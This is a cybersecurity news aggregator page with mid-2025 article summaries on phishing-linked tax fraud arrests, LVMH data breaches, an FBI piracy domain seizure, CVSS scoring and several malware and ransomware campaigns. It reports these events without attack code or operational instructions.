Oktacron logo
Cyber security aggregate rss news

Cyber security aggregator - feeds history
image for 13 Arrested in Roman ...

 Cyber News

Thirteen individuals have been arrested in Romania as part of a major international operation targeting tax fraud linked to phishing attacks. The suspects are believed to have used stolen personal data to make fraudulent claims for tax refunds and benefits in the UK. The arrests follow a coordinated investigation   show more ...

involving more than 100 Romanian police officers and criminal investigators from HM Revenue and Customs (HMRC). The suspects, aged between 23 and 53, were detained in the Romanian counties of Ilfov, Giurgiu, and Calarasi. A separate arrest was also made in Preston, UK. A 38-year-old man was taken into custody in connection with the same investigation. Officers from HMRC seized electronic devices and are continuing to question him. The international investigation is the result of a joint effort between Romanian prosecutors, HMRC, and the UK’s Crown Prosecution Service (CPS). This partnership was set up earlier this year to investigate serious cross-border crimes involving cyber fraud and financial misconduct. Phishing and Tax Fraud Operation According to HMRC, the criminal operation involved the theft of personal data through phishing attacks. Criminals used this information to submit fraudulent PAYE (Pay As You Earn) claims, VAT repayments, and Child Benefit payment requests. The Romanian Police’s Economic Crimes Investigation Directorate led the arrests. The suspects are being investigated for offences including computer fraud, money laundering, and illegal access to a computer system. HMRC emphasized that the fraud did not involve a direct cyberattack on its systems. Rather, criminals used data gathered through phishing and other means to exploit HMRC services. UK Arrest and Ongoing Investigations The 38-year-old man arrested in Preston remains in custody. He is being questioned as part of a separate but related investigation. The operation also included the seizure of electronic devices that may be key to uncovering further details about the criminal network. Two other men, aged 27 and 36, had previously been arrested in Bucharest in November on suspicion of cybercrime and fraud offences. Those investigations are ongoing. Simon Grunwell, Operational Lead in HMRC’s Fraud Investigation Service, praised the international effort and the progress made so far. “These arrests show we work across borders with our international partners to combat tax crime in all its forms. We have a number of live criminal investigations, and we are grateful to our Romanian partners for their support. We have already acted to protect customers after identifying attempts to access a very small minority of tax accounts, and we continue to work with other law enforcement agencies both in the UK and overseas to bring those responsible to justice.” How HMRC Responded HMRC has written to around 100,000 people, which is approximately 0.22% of its customer base, to inform them of attempted unauthorized access to their accounts. These individuals were reassured that their accounts were secured and that no financial losses had occurred. The organization clarified that this was not a cyberattack on HMRC’s systems. Instead, the criminals used stolen information, likely obtained from phishing or data leaks involving other organizations, to access HMRC services fraudulently. HMRC stressed its commitment to security and noted that it is continuously upgrading its systems. As part of the UK government’s June 2025 Spending Review, further investment was announced to strengthen the security of HMRC’s IT infrastructure. HMRC Among Most Spoofed Government Bodies According to the National Cyber Security Centre, HMRC was the third most spoofed UK government agency in 2022, after the NHS and TV Licensing. Phishing attempts that impersonate HMRC remain common and pose an ongoing risk to taxpayers. To help the public stay safe, HMRC encourages individuals to report any suspicious emails, texts, or messages. You can report a scam or phishing attempt online via the official HMRC channels. Conclusion The arrests highlight the growing need for cross-border cooperation to tackle cyber-enabled financial crimes. The joint investigation team formed between the UK and Romania allowed authorities to share intelligence, resources, and expertise. By working together, law enforcement agencies were able to swiftly act against organized groups operating across multiple countries. This kind of collaboration is essential in disrupting sophisticated fraud operations that can otherwise evade national borders. Authorities continue to warn people about the risks of phishing scams. Criminals often send fake emails or text messages that appear to come from trusted sources like HMRC. These messages can trick individuals into sharing sensitive personal or financial information. HMRC advises everyone to be cautious of unexpected requests for information and to never click on suspicious links. Anyone who suspects they have been targeted by a scam should report it immediately.

image for Third Time in 90 Day ...

 Firewall Daily

Louis Vuitton has sent an email to its customers detailing a cyberattack that exposed personal information, making it the third time in 90 days. The latest LVMH cyberattack occurred on July 2, 2025, and adds to a string of security incidents linked to LVMH brands since May. The previous LVMH cyberattack, involving   show more ...

Louis Vuitton Korea, took place on June 8, 2025, when an unauthorized third party accessed internal systems and extracted customer data. While no financial information, such as credit card numbers or banking details, was compromised, Louis Vuitton stated that the LVMH cyberattack has been contained and that steps are being taken to reinforce its cybersecurity measures. Third LVMH Cyberattack Confirmed In a customer notification email, the company revealed that names, contact details, and purchase histories had been exposed in LVHM cyberattack. As with the previous LVMH cyberattacks, no financial or payment data was compromised. Louis Vuitton has notified the UK Information Commissioner’s Office, as required by local data protection regulations, and is working directly with affected individuals. This UK-based incident marks the third LVMH cyberattack in just 90 days, following earlier breaches at Christian Dior Couture and Louis Vuitton Korea. Although no cybercriminal group has taken responsibility, the close timing of the events has drawn industry attention. Customers are being advised to be especially wary of phishing attempts. Scammers may use references to recent purchases, loyalty accounts, or exclusive promotions to trick individuals into revealing more sensitive data. Louis Vuitton Korea Issues Apology and Launches Investigation  In a formal statement, the fashion brand said it deeply regretted the Louis Vuitton Korea data breach and had taken immediate action to secure its systems. The company reported the breach to relevant government authorities and has engaged cybersecurity experts to support the investigation and strengthen its defenses.  Translated from Korean:  “We regret to inform you that an unauthorized third party temporarily accessed our system and leaked some customer information. Fortunately, financial information such as passwords, credit card details, and bank account numbers were not included in the leaked data.”  Louis Vuitton also emphasized the importance of vigilance, urging customers to be cautious of suspicious communications and avoid sharing sensitive credentials. “We remind customers never to share their Louis Vuitton passwords, as we do not request them under any circumstances,” the company noted.  What Information Was Exposed in the Louis Vuitton Korea Data Breach?  According to the internal investigation, the information exposed in the Korea LVMH cyberattack may vary by individual but could include names, surnames, contact details, and other data provided voluntarily by customers. The breach was discovered and confirmed by the company on July 2, following the unauthorized access that occurred in early June.  This latest Louis Vuitton Korea cyberattack follows a similar incident involving Christian Dior Couture, another LVMH brand, in May 2025. Dior reported that an “unauthorized external party” had accessed customer data earlier in the year. French newspaper Le Monde later reported that the Dior breach took place in January and affected customers in Asia.  Neither brand disclosed financial information loss.  Caution Urged Amid Rise in Threats  Following the cyberattack on Louis Vuitton Korea, cybersecurity professionals are warning that high-end retail brands are becoming increasingly attractive targets for hackers. Although financial data was not taken, access to personal information can enable phishing attempts, social engineering scams, and identity theft.  The company’s Korean-language announcement also included a strong warning to customers:  “Given the nature of the exposed information, we advise customers to exercise caution regarding unexpected communications or suspicious messages. Please do not share your Louis Vuitton password with anyone.”  Louis Vuitton Korea stated it is now working with “top cybersecurity experts” to upgrade its system defenses and prevent further incidents. While the company had implemented comprehensive security protocols before the attack, this event highlights how cyber threats are targeting fashion brands. “We are prioritizing the protection of our customers’ personal information and are doing everything possible to prevent such incidents from recurring,” the company assured.  With three confirmed LVMH cyberattack brands—Christian Dior Couture, Louis Vuitton Korea, and now Louis Vuitton UK—attention is turning toward the conglomerate’s overall cybersecurity strategy and whether additional vulnerabilities remain unaddressed.

image for Federal IT Contracto ...

 Compliance

A Maryland-based IT firm, Hill ASC Inc., has agreed to fork over at least $14.75 million in a settlement that brings the federal contractors under the scanner. This isn't just about money but a reminder that cutting corners on IT services for Uncle Sam carries a hefty price, especially when national security is on   show more ...

the line. The U.S. Department of Justice on Monday revealed that Hill Associates allegedly billed federal agencies for IT staff who simply didn't meet the contractually required experience or education. For five years, from 2018 to 2023, the company operated under a General Services Administration (GSA) program, a pipeline meant to get top-tier commercial services to the government efficiently. Investigators also claimed Hill Associates submitted invoices for specific cybersecurity services despite failing a critical technical evaluation. The GSA demands these rigorous assessments for contractors offering highly adaptive cybersecurity solutions to government clients. Not passing such an evaluation points to significant gaps in the company's advertised capabilities. The firm reportedly charged unauthorized fees and neglected to give government customers crucial information about prompt payment discounts. Additionally, Hill Associates included unallowable incentive compensation within a cost submission for a new contract proposal, further muddying its billing practices. Cybersecurity experts believe there is an absolute necessity for strict oversight in government IT contracts. Agencies depend on contractors to uphold the highest standards, particularly when services directly impact federal operations and critical data integrity. Any slip from agreed-upon terms, whether unqualified personnel or misrepresented capabilities, erodes trust and opens doors for potential vulnerabilities. "Federal agencies should get what they have paid for from GSA contractors, nothing less," GSA’s Deputy Inspector General, Robert Erickson said. This sentiment resonates deeply within the cybersecurity community, where the quality of IT infrastructure and the expertise of its stewards directly influence national security and operational resilience. Loren Sciurba, Treasury Deputy Inspector General, added that "false claims and similar unfair advantage by contractors undermine the integrity of the contracting process and can result in significant adverse effects to vital security concerns." The implications stretch far beyond mere financial misconduct; subpar IT services can expose federal systems to advanced persistent threats (APTs) and sophisticated nation-state hackers. Apart from the fine, Hill Associates also agreed to pay 2.5% of its annual gross revenue exceeding $18.8 million beginning next year. The allegations were filed under the False Claims Act, a U.S. federal law that imposes liability on individuals and companies who defraud the government. In fiscal year 2024, the DOJ recovered over $2.9 billion from civil cases involving fraud and false claims. Another defense contractor who settled with DOJ earlier this year was Morse Corp Inc., a Massachusetts-based company. The contractor agreed to pay $4.6 million to resolve allegations of cybersecurity fraud that involved the company misrepresenting its compliance with federal cybersecurity standards while working on contracts with the Departments of the Army and Air Force. Also read: Defense Contractor Morse Corp Settles Cybersecurity Fraud Allegations for $4.6M According to the settlement agreement, Morse Corp submitted a misleading score of 104 on its cybersecurity assessment to the Department of Defense’s Supplier Performance Risk System (SPRS) in January 2021. However, an independent evaluation in July 2022 revealed a significantly lower score of -142, indicating that the company had only implemented 22% of the required controls. While Hill Associates and Morse Corp. agreed to pay the fine and settle without admitting liability, the case shines a bright light on a persistent challenge in public sector contracting. Ensuring vendors truly possess the stated qualifications and deliver services as promised is fundamental to robust cloud security and strong application security. This vigilance protects against future data breaches and maintains the integrity of critical government systems.

image for FBI Seizes NSW2U, PS ...

 Cyber News

The FBI's Atlanta Field Office has seized several major online platforms involved in video game piracy. These websites offered pirated versions of popular video games, many of them made available before their official release dates. Alongside the seizures, the FBI also dismantled the websites' supporting   show more ...

infrastructure, effectively shutting down the operations behind these platforms. According to the agency, these sites have been active for over four years. During this period, they made available pirated copies of new and upcoming games. These unauthorized downloads gave users early access to titles that had not yet reached the market. Between February 28 and May 28, 2025, records show that users downloaded pirated games 3.2 million times from the most commonly used service on these platforms. The estimated financial loss from these activities is around $170 million. [caption id="attachment_103796" align="aligncenter" width="1024"] Source: FBI[/caption] FBI Takes Over Domains Hosting Illegal Game Downloads As part of the takedown, the FBI has obtained legal authorization to seize the domains of multiple websites. These include: nsw2u.com nswdl.com game-2u.com bigngame.com ps4pkg.com ps4pkg.net mgnetu.com These domains were used to host and share pirated video games. Visitors to any of these sites will now see a seizure notice, indicating that the U.S. federal authorities have taken control of the domains. The FBI extended its thanks to international partners. “The FBI would like to thank the Dutch FIOD for their assistance in this investigation,” the agency stated. Nsw2u Among the Most Popular One of the most visited sites, nsw2u, has sparked strong reactions from the online gaming community. For years, gamers used the site to download pirated versions of games for hacked Nintendo Switch devices. In addition to Nintendo Switch titles, the platform also offered PC games. The platform’s popularity was not unnoticed by global authorities. In May 2025, the European Union added nsw2u to its Counterfeit and Piracy Watch List. The EU said game publishers and industry stakeholders had reported the site for distributing unauthorized content. “Operators of these domains are reported not to have reacted to requests by right holders to end the illegal activities,” EU officials stated in the report. As a result of the mounting legal pressure, several European countries passed rules to block access to nsw2u and its related domains. These included the United Kingdom, Spain, Portugal, Italy, Germany, and France. In February 2025 alone, the site saw approximately 2.3 million global visits, underscoring the scale and reach of its operations. Industry Pushback and Global Enforcement The piracy crackdown has not gone unnoticed by industry leaders. In 2021, the Entertainment Software Association (ESA), representing companies like Nintendo, Microsoft, and others, sent a formal letter to the Office of the U.S. Trade Representative. The letter cited nsw2u as a platform that repeatedly ignored takedown notices and failed to cooperate with copyright enforcement. Despite the ESA’s concerns, Nintendo and Sony , the makers of the Nintendo Switch and PlayStation consoles, respectively, did not provide public comments regarding their role in the current operation. [caption id="attachment_103799" align="aligncenter" width="760"] Source: X[/caption] Law enforcement across the U.S. and Europe have increased their efforts in recent years to fight against online piracy. Over the past three years, several major actions have been launched to stop illegal distribution of digital content. Growing Tensions Between Users and Authorities While the authorities celebrate the success of this latest operation, not everyone is happy. Many users expressed frustration online, especially those who had relied on the sites for years to access games without paying. Some members of the gaming community defended their actions by citing high game prices and limited access in certain regions. Others argued that piracy platforms gave players a chance to try games before deciding whether to buy them. However, authorities continue to stress the economic harm caused by piracy. With an estimated loss of $170 million in just three months, game publishers face serious financial threats. Piracy can impact game development budgets, reduce profits, and limit future investments in new projects. Conclusion By disabling the websites and seizing their domains, the FBI has effectively ended access to some of the most used piracy platforms for video games. While some may try to recreate these websites or shift to new domains, law enforcement agencies are working faster and more efficiently than ever before. For now, the FBI’s success in shutting down these websites sends a strong message: piracy is not without consequence, and illegal distribution of games will be met with serious legal actions.

image for Australia Adopts Glo ...

 Regulations

Australia just made a significant move to future-proof its critical infrastructure and beef-up its OT Cybersecurity Standard. It has officially adopted the internationally recognized IEC 62443 series as the national standard—branded locally as AS IEC 62443—for securing Operational Technology (OT) systems against   show more ...

cyber threats. The decision comes at a time when the stakes for protecting industrial systems are higher than ever. From power grids and water treatment plants to transportation systems and hospital devices, OT networks form the digital backbone of the country’s most vital services. And cybercriminals know it. Why IEC 62443 Matters Unlike traditional IT systems, OT environments—also called Industrial Automation and Control Systems (IACS)—can’t afford downtime. A compromised SCADA system controlling water pressure or a PLC managing a railway switch doesn’t just lose data; it can endanger lives, communities, and the environment. OT demands a specialized approach, one that understands the physics of industrial processes as much as the logic of network packets. That’s where IEC 62443 comes in. Developed by the IEC’s Technical Committee 65, the framework provides a modular, role-based cybersecurity playbook specifically designed for industrial environments. Think of it as the NIST of OT, but with tighter alignment to physical safety and real-world operational needs. With its adoption as AS IEC 62443, Australia has now aligned its national security posture with one of the world’s most robust and practical frameworks for OT cyber defense. Also read: Australia Invests $6.4M to Shield Healthcare Sector from Cyber Threats What’s Actually in the Standard? The beauty of AS IEC 62443 lies in its flexibility. It breaks down the complex OT landscape into components tailored for three main audiences: Asset Owners: The companies running the infrastructure Service Providers: Vendors maintaining or integrating technology Product Suppliers: Hardware and software vendors building the underlying systems The standard maps to the system lifecycle, meaning organizations can start with the basics—like risk assessments and segmentation—and evolve their controls as they scale or modernize. What makes this standard particularly powerful for Australia? Modular and Role-Based: It’s not a one-size-fits-all straitjacket. Businesses can pick and choose the relevant parts based on their specific responsibilities (whether they own assets, provide services, or supply products) and the lifecycle stage of their systems. This pragmatism is key to actual implementation, not just theoretical compliance. Alignment with Local Regulations: The standards are designed to dovetail with existing Australian regulatory requirements, making the transition from framework to practical application smoother and more effective across diverse sectors. Why a New OT Cybersecurity Now? This adoption isn’t just a checkbox move—it’s a direct response to a rising tide of cyberattacks on critical infrastructure worldwide. In the last 24 months alone, Australia has witnessed cyber incidents targeting water utilities, transportation networks, and even its healthcare systems. Globally, we’ve seen OT threats like Colonial Pipeline, the Oldsmar water plant attack, and disruptions to Ukraine’s power grid which shows just how vulnerable physical systems have become. By adopting AS IEC 62443, Australia is signaling that it takes these threats seriously—and is committed to building resilience across both legacy and modern infrastructure. Smart Cities, Smart Risk Management The timing also aligns with Australia’s broader push toward smart infrastructure. The IEC is already preparing updates to 62443, including a new Part 1-6 module focused on the Industrial Internet of Things (IIoT). That means better security baselines for smart energy grids, autonomous transport systems, and connected city infrastructure. This isn’t just about defense—it’s about building digital trust into the systems that will define Australia’s economic and societal future. For utilities, telcos, and manufacturers managing OT environments, the message is clear: get on board. Now! Organizations that adopt AS IEC 62443 not only gain better cyber hygiene—they also minimize reputational risk and unlock access to future energy markets like peer-to-peer grid participation. Consumers, regulators, and investors are watching, and cyber maturity is becoming a competitive differentiator. In a world where ransomware gangs and state-sponsored actors are targeting the very systems that keep the lights on and the water flowing, Australia’s move is more than timely. It’s foundational. It's a clear signal that the nation understands the real stakes in the cyber war and is prepared to fortify its industrial heartbeat against any coming storm.

image for What you need to kno ...

 Business

This year marks the 20th anniversary of the Common Vulnerability Scoring System (CVSS), which has become a widely accepted standard for describing software vulnerabilities. Despite decades of use and four generations of the standard — now at version 4.0 — CVSS scoring rules continue to be misused, and the system   show more ...

itself remains the subject of intense debate. So, what do you need to know about CVSS to effectively protect your IT assets? The CVSS Base Score According to its developers, CVSS is a tool for describing the characteristics and severity of software vulnerabilities. CVSS is maintained by the Forum of Incident Response and Security Teams (FIRST). It was created to help experts speak a common language about vulnerabilities, and to facilitate automatic processing of data on software flaws. Almost every vulnerability published in major vulnerability registries like CVE, EUVD, or CNNVD includes a severity assessment based on the CVSS scale. An assessment typically consists of two main parts: A numerical rating (CVSS score), which shows how severe the vulnerability is on a scale from 0 to 10. A score of 10 means its an extremely dangerous, critical vulnerability. A vector, which is a standardized text string that describes the vulnerabilitys key characteristics. This includes details like whether it can be exploited remotely over a network or only locally, if elevated privileges are needed, how complex it is to exploit, and what aspects (such as availability, integrity, or confidentiality) of the vulnerable system are affected by exploitation. Heres an example using the highly severe and actively exploited vulnerability CVE-2021-44228 (Log4Shell): Base Score 10.0 (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H) Lets break that down: the attack vector is network-based, attack complexity is low, privileges required: none, user interaction isnt required, the scope indicates the vulnerability impacts other system components, and the impact on confidentiality, integrity, and availability is high. Detailed descriptions of each component are available in the CVSS 3.1 and CVSS 4.0 specifications. A crucial part of the CVSS system is its scoring methodology — also known as the calculator, and available for both 4.0 and 3.1. By filling in all the vector components, you can automatically get a numerical criticality score. The original CVSS calculation methodology included three metric groups: Base, Temporal, and Environmental. The first group covers the fundamental and unchanging characteristics of a vulnerability, and forms the basis for calculating the CVSS Base Score. The second group includes characteristics that can change over time — such as the availability of published exploit code. The third group is designed for internal organizational use to account for context-specific factors like the vulnerable applications scope or the presence of mitigating security controls in the organizations infrastructure. In CVSS 4.0, the Temporal metrics have evolved into Threat metrics, and a new group of Supplemental metrics has been introduced. Heres how the metrics are interconnected. Software vendors or cybersecurity companies typically assess the Base criticality of a vulnerability (referred to as CVSS-B in the 4.0 specification). They also often provide an assessment related to the availability and public disclosure of an exploit (CVSS-BT in 4.0, and Temporal in 3.1). This assessment is a modified Base Score; therefore CVSS-B can be higher or lower than CVSS-BT. As for the Environmental score (CVSS-BTE), its calculated within a specific organization based on the CVSS-BT, with adjustments made for their unique conditions of using the vulnerable software. The Evolution of CVSS The first two versions of CVSS, released in 2005 and 2007, are hardly used today. While you might still find older CVSS scores for modern vulnerabilities, CVSS 3.1 (2019) and CVSS 4.0 (2023) are the most common scoring systems. However, many software vendors and vulnerability registries arent in a rush to adopt version 4.0, and they continue to provide CVSS 3.1 scores. The core idea behind the first CVSS version was to quantify the severity of vulnerabilities via a scoring system — with an initial separation into Base, Temporal, and Environmental metrics. At that stage, the textual descriptions were loosely formalized, and the three groups of metrics were calculated independently. CVSS 2.0 introduced a standardized vector string and a new logic: a mandatory and unchangeable Base score, a Temporal score calculated from the Base score but accounting for changing factors, and an Environmental score used within specific organizations and conditions derived from either the Base or Temporal score. Versions 3.0 and 3.1 added the concept of Scope (impact on other system components). They also more precisely defined parameters related to required privileges and user interaction, and they generalized and refined the values of many parameters. Most importantly, these versions attempted to solidify the fact that CVSS measures the severity of a vulnerability — not the risks it creates. In version 4.0, the creators aimed to make the CVSS metric more useful for business-level assessments of how vulnerabilities impact risk. This is still not a risk metric, though. Attack complexity was split into two distinct components: attack requirements and attack complexity. This highlights the difference between the inherent engineering difficulty of an attack and the external factors or conditions necessary for the attack to succeed. In practical terms, this means a flaw that requires a specific, non-default configuration on the vulnerable product to be exploited will have higher attack requirements and, consequently, a lower overall CVSS score. The often-misunderstood Scope metric, which simply offered yes or no options for impact on other components, has been replaced. Developers have introduced the clearer concept of subsequent systems, which now specifies what aspect of their operation the vulnerability affects. Additionally, a range of supporting indicators has been added — such as the automatability of an exploit and the impact of exploitation on human physical safety. The formulas themselves have also undergone substantial revisions. The influence of various components on the numerical threat score has been re-evaluated based on a vast database of vulnerabilities and real-world exploitation data. How CVSS 4.0 is changing vulnerability prioritization For cybersecurity professionals, CVSS 4.0 aims to be more practical and relevant to todays realities. Were facing tens of thousands of vulnerabilities — many of which receive a high CVSS score. This often leads to them being automatically flagged for immediate remediation in many organizations. The problem is, these lists are constantly growing, and the average time to fix a vulnerability is nearing seven months. When vulnerabilities are re-evaluated from CVSS 3.1 to CVSS 4.0, the Base Score for defects with a severity between 4.0 and 9.0 tends to slightly increase. However, for vulnerabilities that were considered critically severe in CVSS 3.1, the score often remains unchanged or even decreases. More importantly, while Temporal metrics had little impact on a vulnerabilitys numerical rating before, the influence of Threat and Environmental metrics is now much more significant. Orange Cyberdefense conducted a study to illustrate this. Imagine a company is tracking 8000 vulnerabilities, and their IT and security teams are required to fix all defects with a Base CVSS score above 8 within a specified timeframe. What percentage of these 8000 real-world vulnerabilities would fall into that category — with or without considering exposure of the exploit to the public (Temporal/Threat adjustment)? The study found that CVSS 4.0, in its base version, assigns a score of 8 or higher to a larger percentage of vulnerabilities (33% compared to 18% in version 3.1). However, when adjusted for the availability of exploits, this number drops significantly — leaving fewer truly critical flaws to prioritize (8% versus 10%). Critical, High, and everything in between Whats the difference between a critical vulnerability and one thats just plain dangerous? A text-based severity description is part of the specification — but its not always required in a vulnerability description: Low Severity: 0.1–3.9 Medium Severity: 4.0–6.9 High Severity: 7.0–8.9 Critical Severity: 9.0–10.0 In practice, many software vendors take a creative approach to these text descriptions. They might modify the names or incorporate their own assessments and factors not included in CVSS. A case in point is Junes Microsoft Patch Tuesday — specifically CVE-2025-33064 and CVE-2025-32710. The first is described as Important and the second as Critical, yet their CVSS 3.1 scores are 8.8 and 8.1, respectively.

image for DOGE Denizen Marko E ...

 A Little Sunshine

Marko Elez, a 25-year-old employee at Elon Musk’s Department of Government Efficiency (DOGE), has been granted access to sensitive databases at the U.S. Social Security Administration, the Treasury and Justice departments, and the Department of Homeland Security. So it should fill all Americans with a deep sense   show more ...

of confidence to learn that Mr. Elez over the weekend inadvertently published a private key that allowed anyone to interact directly with more than four dozen large language models (LLMs) developed by Musk’s artificial intelligence company xAI. Image: Shutterstock, @sdx15. On July 13, Mr. Elez committed a code script to GitHub called “agent.py” that included a private application programming interface (API) key for xAI. The inclusion of the private key was first flagged by GitGuardian, a company that specializes in detecting and remediating exposed secrets in public and proprietary environments. GitGuardian’s systems constantly scan GitHub and other code repositories for exposed API keys, and fire off automated alerts to affected users. Philippe Caturegli, “chief hacking officer” at the security consultancy Seralys, said the exposed API key allowed access to at least 52 different LLMs used by xAI. The most recent LLM in the list was called “grok-4-0709” and was created on July 9, 2025. Grok, the generative AI chatbot developed by xAI and integrated into Twitter/X, relies on these and other LLMs (a query to Grok before publication shows Grok currently uses Grok-3, which was launched in Feburary 2025). Earlier today, xAI announced that the Department of Defense will begin using Grok as part of a contract worth up to $200 million. The contract award came less than a week after Grok began spewing antisemitic rants and invoking Adolf Hitler. Mr. Elez did not respond to a request for comment. The code repository containing the private xAI key was removed shortly after Caturegli notified Elez via email. However, Caturegli said the exposed API key still works and has not yet been revoked. “If a developer can’t keep an API key private, it raises questions about how they’re handling far more sensitive government information behind closed doors,” Caturegli told KrebsOnSecurity. Prior to joining DOGE, Marko Elez worked for a number of Musk’s companies. His DOGE career began at the Department of the Treasury, and a legal battle over DOGE’s access to Treasury databases showed Elez was sending unencrypted personal information in violation of the agency’s policies. While still at Treasury, Elez resigned after The Wall Street Journal linked him to social media posts that advocated racism and eugenics. When Vice President J.D. Vance lobbied for Elez to be rehired, President Trump agreed and Musk reinstated him. Since his re-hiring as a DOGE employee, Elez has been granted access to databases at one federal agency after another. TechCrunch reported in February 2025 that he was working at the Social Security Administration. In March, Business Insider found Elez was part of a DOGE detachment assigned to the Department of Labor. Marko Elez, in a photo from a social media profile. In April, The New York Times reported that Elez held positions at the U.S. Customs and Border Protection and the Immigration and Customs Enforcement (ICE) bureaus, as well as the Department of Homeland Security. The Washington Post later reported that Elez, while serving as a DOGE advisor at the Department of Justice, had gained access to the Executive Office for Immigration Review’s Courts and Appeals System (EACS). Elez is not the first DOGE worker to publish internal API keys for xAI: In May, KrebsOnSecurity detailed how another DOGE employee leaked a private xAI key on GitHub for two months, exposing LLMs that were custom made for working with internal data from Musk’s companies, including SpaceX, Tesla and Twitter/X. Caturegli said it’s difficult to trust someone with access to confidential government systems when they can’t even manage the basics of operational security. “One leak is a mistake,” he said. “But when the same type of sensitive key gets exposed again and again, it’s not just bad luck, it’s a sign of deeper negligence and a broken security culture.”

image for AsyncRAT Spawns Conc ...

 Feed

Since surfacing on GitHub in 2019, AsyncRAT has become a poster child for how open source malware can democratize cybercrime, with a mazelike footprint of variants available across the spectrum of functionality.

 Feed

The North Korean threat actors linked to the Contagious Interview campaign have been observed publishing another set of 67 malicious packages to the npm registry, underscoring ongoing attempts to poison the open-source ecosystem via software supply chain attacks. The packages, per Socket, have attracted more than 17,000 downloads, and incorporate a previously undocumented version of a malware

 Feed

Governmental organizations in Southeast Asia are the target of a new campaign that aims to collect sensitive information by means of a previously undocumented Windows backdoor dubbed HazyBeacon. The activity is being tracked by Palo Alto Networks Unit 42 under the moniker CL-STA-1020, where "CL" stands for   show more ...

"cluster" and "STA" refers to "state-backed motivation." "The threat actors behind this

 Feed

AI agents promise to automate everything from financial reconciliations to incident response. Yet every time an AI agent spins up a workflow, it has to authenticate somewhere; often with a high-privilege API key, OAuth token, or service account that defenders can’t easily see. These “invisible” non-human identities (NHIs) now outnumber human accounts in most cloud environments, and they have

 Feed

Cybersecurity researchers have charted the evolution of a widely used remote access trojan called AsyncRAT, which was first released on GitHub in January 2019 and has since served as the foundation for several other variants. "AsyncRAT has cemented its place as a cornerstone of modern malware and as a pervasive threat that has evolved into a sprawling network of forks and variants," ESET

 Feed

Cloudflare on Tuesday said it mitigated 7.3 million distributed denial-of-service (DDoS) attacks in the second quarter of 2025, a significant drop from 20.5 million DDoS attacks it fended off the previous quarter. "Overall, in Q2 2025, hyper-volumetric DDoS attacks skyrocketed," Omer Yoachimik and Jorge Pacheco said. "Cloudflare blocked over 6,500 hyper-volumetric DDoS attacks, an average of 71

 Feed

Cybersecurity researchers have shed light on a new ransomware-as-a-service (RaaS) operation called GLOBAL GROUP that has targeted a wide range of sectors in Australia, Brazil, Europe, and the United States since its emergence in early June 2025. GLOBAL GROUP was "promoted on the Ramp4u forum by the threat actor known as '$$$,'" EclecticIQ researcher Arda Büyükkaya said. "The same actor controls

 AI

In episode 59 of The AI Fix, our hosts ponder whether AIs need a “disagreement dial”, Mark wonders what he could do with an AI-powered “drug design engine”, Graham plays Wolfenstein instead of working, a robot graduates from high school, and a popular rock group is unmasked as an AI fever dream. Graham   show more ...

explains why Grok thinks it’s Mecha Hitler, and Mark reveals which AI is most likely to betray you. All this and much more is discussed in the latest edition of "The AI Fix" podcast by Graham Cluley and Mark Stockley.

 Cyber Security News

Source: thehackernews.com – Author: . While phishing and ransomware dominate headlines, another critical risk quietly persists across most enterprises: exposed Git repositories leaking sensitive data. A risk that silently creates shadow access into core systems Git is the backbone of modern software   show more ...

development, hosting millions of repositories and serving thousands of organizations worldwide. Yet, amid […] La entrada The Unusual Suspect: Git Repos – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . Threat actors behind the Interlock ransomware group have unleashed a new PHP variant of its bespoke remote access trojan (RAT) as part of a widespread campaign using a variant of ClickFix called FileFix. “Since May 2025, activity related to the Interlock RAT has been   show more ...

observed in connection with the LandUpdate808 […] La entrada New PHP-Based Interlock RAT Variant Uses FileFix Delivery Mechanism to Target Multiple Industries – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: thehackernews.com – Author: . In cybersecurity, precision matters—and there’s little room for error. A small mistake, missed setting, or quiet misconfiguration can quickly lead to much bigger problems. The signs we’re seeing this week highlight deeper issues behind what might look like routine   show more ...

incidents: outdated tools, slow response to risks, and the ongoing gap […] La entrada ⚡ Weekly Recap: Scattered Spider Arrests, Car Exploits, macOS Malware, Fortinet RCE and More – Source:thehackernews.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 1 - Cyber Security News Post

Source: www.mcafee.com – Author: McAfee Labs. Authored by Dexter Shin McAfee’s Mobile Research Team discovered a new and active Android malware campaign targeting Bengali-speaking users, mainly Bangladeshi people living abroad. The app poses as popular financial services like TapTap Send and AlimaPay. It is   show more ...

distributed through phishing sites and FacebookFacekbook pages, and the app steals […] La entrada Fake Android Money Transfer App Targeting Bengali-Speaking Users – Source:www.mcafee.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Alexander Culafi Please enable cookies. Sorry, you have been blocked You are unable to access darkreading.com Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security   show more ...

solution. There are several actions that could trigger this […] La entrada Web-Inject Campaign Debuts Fresh Interlock RAT Variant – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Kristina Beek Please enable cookies. Sorry, you have been blocked You are unable to access darkreading.com Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution.   show more ...

There are several actions that could trigger this […] La entrada Military Veterans May Be What Cybersecurity Is Looking For – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Elizabeth Montalbano, Contributing Writer Please enable cookies. Sorry, you have been blocked You are unable to access darkreading.com Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed   show more ...

triggered the security solution. There are several actions that could […] La entrada Google Gemini AI Bug Allows Invisible, Malicious Prompts – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Cyber Security News

Source: www.darkreading.com – Author: Ty Greenhalgh Please enable cookies. Sorry, you have been blocked You are unable to access darkreading.com Why have I been blocked? This website is using a security service to protect itself from online attacks. The action you just performed triggered the security solution.   show more ...

There are several actions that could trigger this […] La entrada The Dark Side of Global Power Shifts & Demographic Decline – Source: www.darkreading.com se publicó primero en CISO2CISO.COM & CYBER SECURITY GROUP.

 Artificial Intelligence

